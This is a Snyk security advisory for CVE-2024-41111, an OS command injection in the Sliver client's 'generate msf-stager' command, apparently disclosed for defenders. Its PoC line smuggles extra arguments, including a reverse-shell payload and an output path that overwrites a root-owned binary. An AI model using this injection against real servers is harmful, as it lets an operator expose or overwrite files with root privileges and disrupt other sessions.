OS Command Injection Affecting github.com/bishopfox/sliver/client/cli package, versions *


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.05% (18th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about OS Command Injection vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-GOLANG-GITHUBCOMBISHOPFOXSLIVERCLIENTCLI-7547210
  • published23 Jul 2024
  • disclosed18 Jul 2024
  • credithyperreality

Introduced: 18 Jul 2024

CVE-2024-41111  (opens in a new tab)
CWE-78  (opens in a new tab)

How to fix?

A fix was pushed into the master branch but not yet published.

Overview

github.com/bishopfox/sliver/client/cli is an implementation of the Sliver client cli

Affected versions of this package are vulnerable to OS Command Injection using the generate msf-stager command. An operator user can expose or modify files on the server with root privileges, or interrupt some or all other sessions on the server by manipulating the --out command-line argument to overwrite the root binary.

PoC

sliver > generate msf-stager --lhost 192.168.0.128 --lport 8888 --advanced --platform=linux&--payload=linux/x64/shell_reverse_tcp&--format=elf&--out=/root/.sliver/go/bin/go

CVSS Scores

version 4.0
version 3.1